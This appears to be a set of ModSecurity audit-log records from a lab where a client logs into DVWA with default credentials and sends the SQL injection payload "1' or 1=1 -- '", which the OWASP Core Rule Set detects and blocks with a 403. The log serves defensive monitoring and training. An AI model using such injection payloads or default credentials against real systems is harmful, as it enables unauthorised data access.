{"transaction":{"time":"13/May/2017:13:24:01 --0400","transaction_id":"WRdBMX8AAQEAABwQSCcAAAAD","remote_address":"192.168.75.181","remote_port":47176,"local_address":"192.168.75.136","local_port":80},"request":{"request_line":"GET /dvwa/login.php HTTP/1.1","headers":{"Host":"192.168.75.136","User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://192.168.75.136/dvwa/vulnerabilities/sqli/","Cookie":"security=low; PHPSESSID=j4ho0gge83rg7kdh8jf6n2g3p4","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":200,"headers":{"Expires":"Tue, 23 Jun 2009 12:00:00 GMT","Cache-Control":"no-cache, must-revalidate","Pragma":"no-cache","Vary":"Accept-Encoding","Content-Encoding":"gzip","Content-Length":"697","Keep-Alive":"timeout=5, max=99","Connection":"Keep-Alive","Content-Type":"text/html;charset=utf-8"},"body":"\u001F‹\b"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.181] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. 
[file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/login.php\"] [unique_id \"WRdBMX8AAQEAABwQSCcAAAAD\"]"],"handler":"application/x-httpd-php","stopwatch":{"p1":801,"p2":3361,"p3":101,"p4":399,"p5":65,"sr":42,"sw":1,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:13:24:07 --0400","transaction_id":"WRdBN38AAQEAABwRiH4AAAAE","remote_address":"192.168.75.181","remote_port":47178,"local_address":"192.168.75.136","local_port":80},"request":{"request_line":"POST /dvwa/login.php HTTP/1.1","headers":{"Host":"192.168.75.136","User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://192.168.75.136/dvwa/login.php","Cookie":"security=low; PHPSESSID=j4ho0gge83rg7kdh8jf6n2g3p4","Connection":"keep-alive","Content-Type":"application/x-www-form-urlencoded","Content-Length":"88"},"body":["username=admin&password=password&Login=Login&user_token=0d1e1d2fde1d63d122a646a2193d0477"]},"response":{"protocol":"HTTP/1.1","status":302,"headers":{"Expires":"Thu, 19 Nov 1981 08:52:00 GMT","Cache-Control":"no-store, no-cache, must-revalidate, post-check=0, pre-check=0","Pragma":"no-cache","Location":"index.php","Content-Length":"0","Keep-Alive":"timeout=5, max=100","Connection":"Keep-Alive","Content-Type":"text/html; charset=UTF-8"},"body":""},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.181] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. 
[file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/login.php\"] [unique_id \"WRdBN38AAQEAABwRiH4AAAAE\"]"],"handler":"application/x-httpd-php","stopwatch":{"p1":685,"p2":4475,"p3":180,"p4":505,"p5":207,"sr":26,"sw":1,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:13:24:07 --0400","transaction_id":"WRdBN38AAQEAABwRiH8AAAAE","remote_address":"192.168.75.181","remote_port":47178,"local_address":"192.168.75.136","local_port":80},"request":{"request_line":"GET /dvwa/index.php HTTP/1.1","headers":{"Host":"192.168.75.136","User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://192.168.75.136/dvwa/login.php","Cookie":"security=low; PHPSESSID=j4ho0gge83rg7kdh8jf6n2g3p4","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":200,"headers":{"Expires":"Tue, 23 Jun 2009 12:00:00 GMT","Cache-Control":"no-cache, must-revalidate","Pragma":"no-cache","Vary":"Accept-Encoding","Content-Encoding":"gzip","Content-Length":"2725","Keep-Alive":"timeout=5, max=99","Connection":"Keep-Alive","Content-Type":"text/html;charset=utf-8"},"body":"\u001F‹\b"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.181] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. 
[file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/index.php\"] [unique_id \"WRdBN38AAQEAABwRiH8AAAAE\"]"],"handler":"application/x-httpd-php","stopwatch":{"p1":658,"p2":2061,"p3":169,"p4":2695,"p5":89,"sr":23,"sw":1,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:13:24:11 --0400","transaction_id":"WRdBO38AAQEAABwRiIAAAAAE","remote_address":"192.168.75.181","remote_port":47178,"local_address":"192.168.75.136","local_port":80},"request":{"request_line":"GET /dvwa/vulnerabilities/sqli/ HTTP/1.1","headers":{"Host":"192.168.75.136","User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://192.168.75.136/dvwa/index.php","Cookie":"security=low; PHPSESSID=j4ho0gge83rg7kdh8jf6n2g3p4","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":200,"headers":{"Expires":"Tue, 23 Jun 2009 12:00:00 GMT","Cache-Control":"no-cache, must-revalidate","Pragma":"no-cache","Vary":"Accept-Encoding","Content-Encoding":"gzip","Content-Length":"1456","Keep-Alive":"timeout=5, max=98","Connection":"Keep-Alive","Content-Type":"text/html;charset=utf-8"},"body":"\u001F‹\b"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.181] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. 
[file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRdBO38AAQEAABwRiIAAAAAE\"]"],"handler":"application/x-httpd-php","stopwatch":{"p1":580,"p2":2027,"p3":114,"p4":553,"p5":100,"sr":28,"sw":0,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:13:24:11 --0400","transaction_id":"WRdBO38AAQEAABwNvyUAAAAA","remote_address":"192.168.75.181","remote_port":47180,"local_address":"192.168.75.136","local_port":80},"request":{"request_line":"GET /dvwa/vulnerabilities/sqli/ HTTP/1.1","headers":{"Host":"192.168.75.136","User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://192.168.75.136/dvwa/index.php","Cookie":"security=low; PHPSESSID=j4ho0gge83rg7kdh8jf6n2g3p4","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":200,"headers":{"Expires":"Tue, 23 Jun 2009 12:00:00 GMT","Cache-Control":"no-cache, must-revalidate","Pragma":"no-cache","Vary":"Accept-Encoding","Content-Encoding":"gzip","Content-Length":"1456","Keep-Alive":"timeout=5, max=100","Connection":"Keep-Alive","Content-Type":"text/html;charset=utf-8"},"body":"\u001F‹\b"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.181] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. 
[file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRdBO38AAQEAABwNvyUAAAAA\"]"],"handler":"application/x-httpd-php","stopwatch":{"p1":828,"p2":2535,"p3":118,"p4":957,"p5":140,"sr":34,"sw":1,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:13:24:13 --0400","transaction_id":"WRdBPX8AAQEAABwNvyYAAAAA","remote_address":"192.168.75.181","remote_port":47180,"local_address":"192.168.75.136","local_port":80},"request":{"request_line":"GET /dvwa/vulnerabilities/sqli/?id=1&Submit=Submit HTTP/1.1","headers":{"Host":"192.168.75.136","User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://192.168.75.136/dvwa/vulnerabilities/sqli/","Cookie":"security=low; PHPSESSID=j4ho0gge83rg7kdh8jf6n2g3p4","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":200,"headers":{"Expires":"Tue, 23 Jun 2009 12:00:00 GMT","Cache-Control":"no-cache, must-revalidate","Pragma":"no-cache","Vary":"Accept-Encoding","Content-Encoding":"gzip","Content-Length":"1480","Keep-Alive":"timeout=5, max=99","Connection":"Keep-Alive","Content-Type":"text/html;charset=utf-8"},"body":"\u001F‹\b"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.181] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. 
[file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRdBPX8AAQEAABwNvyYAAAAA\"]"],"handler":"application/x-httpd-php","stopwatch":{"p1":597,"p2":2752,"p3":153,"p4":505,"p5":88,"sr":29,"sw":1,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:13:27:24 --0400","transaction_id":"WRdB-H8AAQEAABzhe10AAAAF","remote_address":"192.168.75.181","remote_port":47184,"local_address":"192.168.75.136","local_port":80},"request":{"request_line":"GET /dvwa/vulnerabilities/sqli/?id=1%27+or+1%3D1+--+%27&Submit=Submit HTTP/1.1","headers":{"Host":"192.168.75.136","User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://192.168.75.136/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit","Cookie":"security=low; PHPSESSID=j4ho0gge83rg7kdh8jf6n2g3p4","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":403,"headers":{"Content-Length":"315","Keep-Alive":"timeout=5, max=100","Connection":"Keep-Alive","Content-Type":"text/html; charset=iso-8859-1"},"body":"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n<html><head>\n<title>403 Forbidden</title>\n</head><body>\n<h1>Forbidden</h1>\n<p>You don't have permission to access /dvwa/vulnerabilities/sqli/\non this server.<br />\n</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at 192.168.75.136 Port 80</address>\n</body></html>\n"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]","Warning. 
detected SQLi using libinjection with fingerprint 's&1c' [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf\"] [line \"68\"] [id \"942100\"] [rev \"1\"] [msg \"SQL Injection Attack Detected via libinjection\"] [data \"Matched Data: s&1c found within ARGS:id: 1' or 1=1 -- '\"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-sqli\"] [tag \"OWASP_CRS/WEB_ATTACK/SQL_INJECTION\"] [tag \"WASCTC/WASC-19\"] [tag \"OWASP_TOP_10/A1\"] [tag \"OWASP_AppSensor/CIE1\"] [tag \"PCI/6.5.2\"]","Warning. detected SQLi using libinjection with fingerprint 's&1' [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf\"] [line \"68\"] [id \"942100\"] [rev \"1\"] [msg \"SQL Injection Attack Detected via libinjection\"] [data \"Matched Data: s&1 found within ARGS:id: 1' or 1=1 \"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-sqli\"] [tag \"OWASP_CRS/WEB_ATTACK/SQL_INJECTION\"] [tag \"WASCTC/WASC-19\"] [tag \"OWASP_TOP_10/A1\"] [tag \"OWASP_AppSensor/CIE1\"] [tag \"PCI/6.5.2\"]","Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf\"] [line \"57\"] [id \"949110\"] [msg \"Inbound Anomaly Score Exceeded (Total Score: 13)\"] [severity \"CRITICAL\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-generic\"]","Warning. Operator GE matched 5 at TX:inbound_anomaly_score. 
[file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf\"] [line \"73\"] [id \"980130\"] [msg \"Inbound Anomaly Score Exceeded (Total Inbound Score: 13 - SQLI=10,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection\"] [tag \"event-correlation\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.181] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRdB-H8AAQEAABzhe10AAAAF\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.181] ModSecurity: Warning. 
detected SQLi using libinjection with fingerprint 's&1c' [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf\"] [line \"68\"] [id \"942100\"] [rev \"1\"] [msg \"SQL Injection Attack Detected via libinjection\"] [data \"Matched Data: s&1c found within ARGS:id: 1' or 1=1 -- '\"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-sqli\"] [tag \"OWASP_CRS/WEB_ATTACK/SQL_INJECTION\"] [tag \"WASCTC/WASC-19\"] [tag \"OWASP_TOP_10/A1\"] [tag \"OWASP_AppSensor/CIE1\"] [tag \"PCI/6.5.2\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRdB-H8AAQEAABzhe10AAAAF\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.181] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 's&1' [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf\"] [line \"68\"] [id \"942100\"] [rev \"1\"] [msg \"SQL Injection Attack Detected via libinjection\"] [data \"Matched Data: s&1 found within ARGS:id: 1' or 1=1 \"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-sqli\"] [tag \"OWASP_CRS/WEB_ATTACK/SQL_INJECTION\"] [tag \"WASCTC/WASC-19\"] [tag \"OWASP_TOP_10/A1\"] [tag \"OWASP_AppSensor/CIE1\"] [tag \"PCI/6.5.2\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRdB-H8AAQEAABzhe10AAAAF\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.181] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. 
[file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf\"] [line \"57\"] [id \"949110\"] [msg \"Inbound Anomaly Score Exceeded (Total Score: 13)\"] [severity \"CRITICAL\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-generic\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRdB-H8AAQEAABzhe10AAAAF\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.181] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf\"] [line \"73\"] [id \"980130\"] [msg \"Inbound Anomaly Score Exceeded (Total Inbound Score: 13 - SQLI=10,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection\"] [tag \"event-correlation\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRdB-H8AAQEAABzhe10AAAAF\"]"],"action":{"intercepted":true,"phase":2,"message":"Operator GE matched 5 at TX:anomaly_score."},"stopwatch":{"p1":1045,"p2":3564,"p3":0,"p4":0,"p5":184,"sr":30,"sw":1,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
